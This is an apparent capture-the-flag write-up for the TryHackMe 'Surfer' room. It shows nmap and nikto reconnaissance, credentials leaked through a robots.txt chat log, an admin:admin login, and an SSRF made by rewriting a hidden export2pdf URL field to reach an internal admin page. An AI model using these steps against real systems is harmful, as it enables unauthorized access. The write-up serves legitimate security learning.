Room link: https://tryhackme.com/room/surfer
Just to ensure that I wasn't missing anything. I ran an aggressive NMAP scan.
ajread@aj-ubuntu:~/TryHackMe$ nmap -A [REMOTE IP]
Starting Nmap 7.80 ( https://nmap.org ) at 2022-10-27 19:16 EDT
Nmap scan report for [REMOTE IP]
Host is up (0.073s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/backup/chat.txt
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 24X7 System+
|_Requested resource was /login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds
I ran nikto as well to see what possible web app vulnerabilities there were.
ajread@aj-ubuntu:~/TryHackMe$ nikto -h [REMOTE IP]
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: [REMOTE IP]
+ Target Hostname: [REMOTE IP]
+ Target Port: 80
+ Start Time: 2022-10-27 19:16:35 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.2.34
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x28 0x5d9416f2ee840
+ File/dir '/backup/chat.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2022-10-27 19:28:10 (GMT-4) (695 seconds)
---------------------------------------------------------------------------
As seen, there was a robots.txt entry. I investigated the entry and found and interesting chat log.
ajread@aj-ubuntu:~/TryHackMe$ curl http://[REMOTE IP]/backup/chat.txt
Admin: I have finished setting up the new export2pdf tool.
Kate: Thanks, we will require daily system reports in pdf format.
Admin: Yes, I am updated about that.
Kate: Have you finished adding the internal server.
Admin: Yes, it should be serving flag from now.
Kate: Also Don't forget to change the creds, plz stop using your username as password.
Kate: Hello.. ?
Therefore, I was able to log into the application with credentials admin:admin
. On the right hand side within Recent Activity, the application stated that the flag was located within /internal/admin.php
.The chat above talked about the export2pdf tool that was new as well. I needed to conduct SSRF to access the internal page. I decided to check out how the export2pdf interacts with the webpage. It appeared to submit a POST request to an internal info page.
<!-- Reports -->
<div class="col-12">
<div class="card">
<div class="card-body">
<h5 class="card-title">Export Reports <span>/Today</span></h5>
<form class="row g-3 needs-validation" novalidate action="export2pdf.php" method="POST">
<input type="hidden" id="url" name="url" value="http://127.0.0.1/server-info.php">
<div class="col-12">
<button class="btn btn-primary w-100" type="submit">Export to PDF</button>
</div>
</form>
</div>
</div>
</div><!-- End Reports -->
I changed the value of the webpage to be the /internal/admin.php
page and resent the request by clicking the Export to PDF button.
<!-- Reports -->
<div class="col-12">
<div class="card">
<div class="card-body">
<h5 class="card-title">Export Reports <span>/Today</span></h5>
<form class="row g-3 needs-validation" novalidate action="export2pdf.php" method="POST">
<input type="hidden" id="url" name="url" value="http://127.0.0.1/internal/admin.php">
<div class="col-12">
<button class="btn btn-primary w-100" type="submit">Export to PDF</button>
</div>
</form>
</div>
</div>
</div><!-- End Reports -->
Finally, I found the flag!